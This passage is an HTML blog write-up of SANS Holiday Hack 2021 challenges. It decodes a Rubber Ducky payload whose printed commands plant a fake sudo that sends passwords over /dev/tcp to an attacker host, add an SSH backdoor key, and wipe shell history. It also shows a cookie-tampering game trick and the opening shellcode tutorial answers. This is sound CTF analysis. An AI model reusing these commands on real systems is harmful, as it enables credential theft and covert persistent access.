&lt;span class="go"&gt;                        Location to output analysis. Default will print analysis to screen.&lt;/span&gt;
&lt;span class="go"&gt;  --debug               Enable Debug Logging.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Just our luck! There's a script called &lt;code&gt;mallard.py&lt;/code&gt; that seems to be able
to decode &lt;code&gt;inject.bin&lt;/code&gt; files. Let's try it out:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@8d20656cc784:~$&lt;/span&gt; ./mallard.py --file /mnt/USBDEVICE/inject.bin

&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 1000&lt;/span&gt;
&lt;span class="go"&gt;GUI SPACE&lt;/span&gt;
&lt;span class="go"&gt;DELAY 500&lt;/span&gt;
&lt;span class="go"&gt;STRING terminal&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 500&lt;/span&gt;
&lt;span class="go"&gt;GUI -&lt;/span&gt;
&lt;span class="go"&gt;GUI -&lt;/span&gt;
&lt;span class="go"&gt;GUI -&lt;/span&gt;
&lt;span class="go"&gt;GUI -&lt;/span&gt;
&lt;span class="go"&gt;GUI -&lt;/span&gt;
&lt;span class="go"&gt;STRING  /bin/bash&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 500&lt;/span&gt;
&lt;span class="go"&gt;STRING mkdir -p ~/.config/sudo&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 200&lt;/span&gt;
&lt;span class="go"&gt;STRING echo &amp;#39;#!/bin/bash &amp;gt; ~/.config/sudo/sudo&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING /usr/bin/sudo $@&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo -n \&amp;quot;[sudo] password for $USER: \&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING read -s pwd&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;$pwd\&amp;quot; | /usr/bin/sudo -S true 2&amp;gt;/dev/null&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING if [ $? -eq 1 ]&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING then&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;$USER:$pwd:invalid\&amp;quot; &amp;gt; /dev/tcp/trollfun.jackfrosttower.com/1337&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;Sorry, try again.\&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING sudo $@&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING else&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;$USER:$pwd:valid\&amp;quot; &amp;gt; /dev/tcp/trollfun.jackfrosttower.com/1337&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;$pwd\&amp;quot; | /usr/bin/sudo -S $@&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING fi&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;STRING fi&amp;#39; &amp;gt; ~/.config/sudo/sudo&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 200&lt;/span&gt;
&lt;span class="go"&gt;STRING chmod u+x ~/.config/sudo/sudo&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 200&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;export PATH=~/.config/sudo:$PATH\&amp;quot; &amp;gt;&amp;gt; ~/.bash_profile&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 200&lt;/span&gt;
&lt;span class="go"&gt;STRING echo \&amp;quot;export PATH=~/.config/sudo:$PATH\&amp;quot; &amp;gt;&amp;gt; ~/.bashrc&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 200&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 600&lt;/span&gt;
&lt;span class="go"&gt;STRING history -c &amp;amp;&amp;amp; rm .bash_history &amp;amp;&amp;amp; exit&lt;/span&gt;
&lt;span class="go"&gt;ENTER&lt;/span&gt;
&lt;span class="go"&gt;DELAY 600&lt;/span&gt;
&lt;span class="go"&gt;GUI q&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A nasty payload! It seems the Rubber Ducky is configured to open the
&lt;code&gt;terminal&lt;/code&gt; application, and then create a malicious script in
&lt;code&gt;~/.config/sudo/sudo&lt;/code&gt; that sends passwords to &lt;code&gt;trollfun.jackfrosttower.com:1337&lt;/code&gt;.
The &lt;code&gt;PATH&lt;/code&gt; variable is then modified so that this malicious &lt;code&gt;sudo&lt;/code&gt;
is called instead of the legitimate one.&lt;/p&gt;
&lt;p&gt;There's also some encoded payload that is executed (see the highlighted part).
Let's decode it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; rev &lt;span class="p"&gt;|&lt;/span&gt; base64 -d
&lt;span class="go"&gt;echo &amp;#39;ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com&amp;#39; &amp;gt;&amp;gt; ~/.ssh/authorized_keys&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This payload adds a backdoor to the &lt;code&gt;~/.ssh/authorized_keys&lt;/code&gt; file, so
that the attacker can get access to the compromised box with their own SSH
key. The associated username is &lt;code&gt;ickymcgoop&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-6"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id20"&gt;Objective 6:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="chimney-scissorsticks-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id21"&gt;Chimney Scissorsticks's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This Cranberry Pi Challenge is called &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Guitar_Hero_(video_game)"&gt;Holiday Hero&lt;/a&gt;.
Basically, two players must cooperate to fuel Santa's sleigh, by pressing the
right keys at the right time, to the rythm of &amp;quot;Jingle Bells&amp;quot;.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Player 1 controls the red and yellow buttons, by pressing down on &amp;quot;Q&amp;quot; and &amp;quot;W&amp;quot;
respectively.&lt;/li&gt;
&lt;li&gt;Player 2 controls the green and blue buttons, by pressing down on &amp;quot;E&amp;quot; and &amp;quot;R&amp;quot;
respectively.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you press at the right time, the sleigh's tank fuels up. If you press at a
wrong moment, the sleigh's tank fuels down. You must get the tank fueled at
least to 80% to win.&lt;/p&gt;
&lt;img alt="A game of Holiday Hero. In the middle of the screen, Santa's sleigh. At the bottom of the screen, the sleigh's fuel gauge. On the left-hand side of the screen, two tracks (a red one and a yellow one). There are two buttons below the tracks, one marked Q for the red track, one marked W for the yellow track. On the right-hand side of the screen, there are two similar tracks: a green one and a blue one, with their corresponding buttons, marked E and R. Inside the tracks, music notes are falling down. They can get zapped by a blue laser when the user presses the buttons down at the right time." class="align-center" src="/images/sans-christmas-challenge-2021/holiday_hero_presentation.png" /&gt;
&lt;p&gt;However, according to Chimney Scissorsticks, there is a way to play in
single-user mode, by modifying two client-side variables, including one that
is sent to the server.&lt;/p&gt;
&lt;p&gt;If we take a look at the requests sent by our browser, we can see an
interesting cookie:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/?challenge=hero&amp;amp;id=506bbc6c-5a16-4d9d-bd15-5a023bcbc732&amp;amp;username=useless&amp;amp;area=netwars&amp;amp;location=4,10&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;hero.kringlecastle.com&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;HOHOHO=%7B%22single_player%22%3Afalse%7D&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://2021.kringlecon.com/&lt;/span&gt;
&lt;span class="na"&gt;Upgrade-Insecure-Requests&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;iframe&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;navigate&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cross-site&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The cookie &lt;code&gt;HOHOHO&lt;/code&gt; contains the URL-encoded string
&lt;code&gt;{&amp;quot;single_player&amp;quot;:false}&lt;/code&gt;. We can modify this cookie with our browser
developer tools, to change that to &lt;code&gt;{&amp;quot;single_player&amp;quot;:true}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For the second variable, we can take a look at the script hosted at
&lt;a class="reference external" href="https://hero.kringlecastle.com/assets/js/holidayhero.min.js"&gt;https://hero.kringlecastle.com/assets/js/holidayhero.min.js&lt;/a&gt;. It's been
minified, but at the beginning of the file, we can see the following variable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nx"&gt;single_player_mode&lt;/span&gt;&lt;span class="o"&gt;=!&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can create a match-and-replace rule in Burp to set this variable to 1, so
that the single-player mode is activated:&lt;/p&gt;
&lt;img alt="A match-and-replace rule created in Burp. It changes the previous code to single_player_mode=1" class="align-center" src="/images/sans-christmas-challenge-2021/holiday_hero_burp_rule.png" /&gt;
&lt;p&gt;I also enabled Burp's default match-and-replace rules that force non-cached
responses, so that my script modification is taken into account when I reload
the game (the rules are commented with &amp;quot;Require non-cached response&amp;quot;).&lt;/p&gt;
&lt;p&gt;After this, we can launch the game and play it in single-player mode. In this
mode, the green and blue tracks are played by the computer, we only have to
play the red and yellow tracks.&lt;/p&gt;
&lt;img alt="A speed-up animated image of a play of Holiday Hero. The final score is 97% which is enough to display the message &amp;quot;Sleigh Refuel Success!&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2021/holiday_hero_win.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="shellcode-primer"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id22"&gt;Shellcode Primer&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're supposed to go to Jack Frost's office. However, the elavator seems to
be out of order. You can take a look at &lt;a class="reference external" href="#grody-goiterson-s-cranberry-pi-challenge"&gt;Grody Goiterson's challenge&lt;/a&gt;
to see how we can get it to work.&lt;/p&gt;
&lt;p&gt;In Jack's office, we find a &lt;a class="reference external" href="https://tracer.kringlecastle.com/"&gt;tutorial on how to write x64 shellcode&lt;/a&gt;.
I won't explain how it works, because the tutorial does a great job on that
front, so there's no need for me to re-type everything that is said over there.
I recommend you carefully read the website, because I'll only give the
answers to the different exercises.&lt;/p&gt;
&lt;div class="section" id="id1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id23"&gt;1. Introduction&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This exercise is just an introduction explaining how the website works, and
presenting the different basic operations, such as &lt;code&gt;mov&lt;/code&gt;, &lt;code&gt;push&lt;/code&gt;,
&lt;code&gt;pop&lt;/code&gt;, &lt;code&gt;call&lt;/code&gt;, and &lt;code&gt;ret&lt;/code&gt;. We can just execute the example
code to get to the next exercise.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="loops"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id24"&gt;2. Loops&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This exercise explains how to write a loop in x64 assembly, using labels and
the &lt;code&gt;jnz&lt;/code&gt; operator. Like the first exercise, we juste have to execute
the example code to move on.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-started"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id25"&gt;3. Getting started&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Alright, now we're going to start writing assembly! The instructions say:&lt;/p&gt;
&lt;blockquote&gt;
This level currently fails to build because it has no code. Can you add a
return statement at the end? Don't worry about what it's actually returning
(yet!)&lt;/blockquote&gt;
&lt;p&gt;So let's add a &lt;code&gt;ret&lt;/code&gt; at the end of the code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; This is a comment! We&amp;#39;ll use comments to help guide your journey.&lt;/span&gt;
&lt;span class="c"&gt;; Right now, we just need to RETurn!&lt;/span&gt;
&lt;span class="c"&gt;;&lt;/span&gt;
&lt;span class="c"&gt;; Enter a return statement below and hit Execute to see what happens!&lt;/span&gt;

&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We execute our code, which unlocks the next exercise.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="returning-a-value"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id26"&gt;4. Returning a Value&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Our previous code did not return any value. Now, the instructions say:&lt;/p&gt;
&lt;blockquote&gt;
For this level, can you return the number '1337' from your function?&lt;/blockquote&gt;
&lt;p&gt;We can add a &lt;code&gt;mov&lt;/code&gt; to store a value in &lt;code&gt;rax&lt;/code&gt;, the register used
to store return values:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; TODO: Set rax to 1337&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;

&lt;span class="c"&gt;; Return, just like we did last time&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This code unlocks the next exercise.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="system-calls"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id27"&gt;5. System Calls&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Now we're moving on to syscalls, which are used to call kernel functions from
our code. The instructions say:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;For this challenge, we're going to call sys_exit to exit the process with
exit code 99.&lt;/p&gt;
&lt;p&gt;Can you prepare rax and rdi with the correct values to exit?&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The tutorial gives us a &lt;a class="reference external" href="https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/"&gt;link to a list of available syscalls on Linux&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To call &lt;code&gt;sys_exit&lt;/code&gt;, we see that we must set &lt;code&gt;rax&lt;/code&gt; to 60, and put
our error code in the &lt;code&gt;rdi&lt;/code&gt; register. Let's do this!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; TODO: Find the syscall number for sys_exit and put it in rax&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Put the exit_code we want (99) in rdi&lt;/span&gt;
&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;99&lt;/span&gt;

&lt;span class="c"&gt;; Perform the actual syscall&lt;/span&gt;
&lt;span class="nf"&gt;syscall&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our previous code allows us to unlock the next exercise.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="calling-into-the-void"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id28"&gt;6. Calling Into the Void&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This exercise just crashes the assembly emulator, with the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; Push this value to the stack&lt;/span&gt;
&lt;span class="nf"&gt;push&lt;/span&gt; &lt;span class="mi"&gt;0x12345678&lt;/span&gt;

&lt;span class="c"&gt;; Try to return&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we execute this code, we can see that, after the &lt;code&gt;ret&lt;/code&gt;, we get
the following error message:&lt;/p&gt;
&lt;blockquote&gt;
Execution crashed with a segmentation fault (SIGSEGV) &amp;#64; 0x12345678&lt;/blockquote&gt;
&lt;p&gt;This means that &lt;code&gt;ret&lt;/code&gt; tries to return to the address that is stored on
the stack. This will be helpful for future exercises.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-rip"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id29"&gt;7. Getting RIP&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The goal of this exercise is to use what we learn in the last one (&lt;em&gt;i.e.&lt;/em&gt;
that &lt;code&gt;ret&lt;/code&gt; tries to return to the first address on the stack) to get
the address of instructions in our code.&lt;/p&gt;
&lt;p&gt;The trick is to use another instruction, &lt;code&gt;call&lt;/code&gt;, that &lt;em&gt;stores&lt;/em&gt; the next
instruction's address on the stack. By using a label in our code and a
&lt;code&gt;call&lt;/code&gt; instruction, we can recover the address of a particular section
of our code.&lt;/p&gt;
&lt;p&gt;The instructions say:&lt;/p&gt;
&lt;blockquote&gt;
For this exercise, can you pop the address after the call - the No Op (nop)
instruction - into rax then return?&lt;/blockquote&gt;
&lt;p&gt;Let's do so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; Remember, this call pushes the return address to the stack&lt;/span&gt;
&lt;span class="nf"&gt;call&lt;/span&gt; &lt;span class="no"&gt;place_below_the_nop&lt;/span&gt;

&lt;span class="c"&gt;; This is where the function *thinks* it is supposed to return&lt;/span&gt;
&lt;span class="nf"&gt;nop&lt;/span&gt;

&lt;span class="c"&gt;; This is a &amp;#39;label&amp;#39; - as far as the call knows, this is the start of a function&lt;/span&gt;
&lt;span class="nl"&gt;place_below_the_nop:&lt;/span&gt;

&lt;span class="c"&gt;; TODO: Pop the top of the stack into rax&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;pop&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; Return from our code, as in previous levels&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After our &lt;code&gt;pop&lt;/code&gt; instruction, &lt;code&gt;rax&lt;/code&gt; is equal to &lt;code&gt;0x13370005&lt;/code&gt;,
which is the address of our &lt;code&gt;nop&lt;/code&gt; instruction.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hello-world"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id30"&gt;8. Hello, World!&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;In this exercise, we use the trick learn in exercise 7 to recover the address
of a string in our code. The code is basically the same as exercise 7:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; This would be a good place for a call&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;call&lt;/span&gt; &lt;span class="no"&gt;get_hello_world_address&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; This is the literal string &amp;#39;Hello World&amp;#39;, null terminated, as code. Except&lt;/span&gt;
&lt;span class="c"&gt;; it&amp;#39;ll crash if it actually tries to run, so we&amp;#39;d better jump over it!&lt;/span&gt;
&lt;span class="nf"&gt;db&lt;/span&gt; &lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="no"&gt;Hello&lt;/span&gt; &lt;span class="no"&gt;World&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="c"&gt;; This would be a good place for a label and a pop&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nl"&gt;get_hello_world_address:&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="nf"&gt;pop&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; This would be a good place for a re... oh wait, it&amp;#39;s already here. Hooray!&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id31"&gt;9. Hello, World!!&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Now that we can get addresses of strings stored in our code, the goal is to
print them, using the &lt;code&gt;sys_write&lt;/code&gt; syscall:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;; TODO: Get a reference to this string into the correct register&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;call&lt;/span&gt; &lt;span class="no"&gt;get_hello_world_address&lt;/span&gt;
&lt;/span&gt;&lt;span class="nf"&gt;db&lt;/span&gt; &lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="no"&gt;Hello&lt;/span&gt; &lt;span class="no"&gt;World&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="nl"&gt;get_hello_world_address:&lt;/span&gt;

&lt;span class="c"&gt;; Set up a call to sys_write&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rax to the correct syscall number for sys_write&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rdi to the first argument (the file descriptor, 1)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rsi to the second argument (buf - this is the &amp;quot;Hello World&amp;quot; string)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;pop&lt;/span&gt; &lt;span class="no"&gt;rsi&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; TODO: Set rdx to the third argument (length of the string, in bytes)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="nf"&gt;mov&lt;/span&gt; &lt;span class="no"&gt;rdx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt;
&lt;/span&gt;
&lt;span class="c"&gt;; Perform the syscall&lt;/span&gt;
&lt;span class="nf"&gt;syscall&lt;/span&gt;

&lt;span class="c"&gt;; Return cleanly&lt;/span&gt;
&lt;span class="nf"&gt;ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="opening-a-file"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id32"&gt;10. Opening a File&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Now the goal is to open the file &lt;code&gt;/etc/passwd&lt;/code&gt;. This is basically the
same as the last exercise, but we're calling &lt;code&gt;sys_open&lt;/code&gt; instead of
&lt;code&gt;sys_write&lt;/code&gt;:&lt;/p&gt;
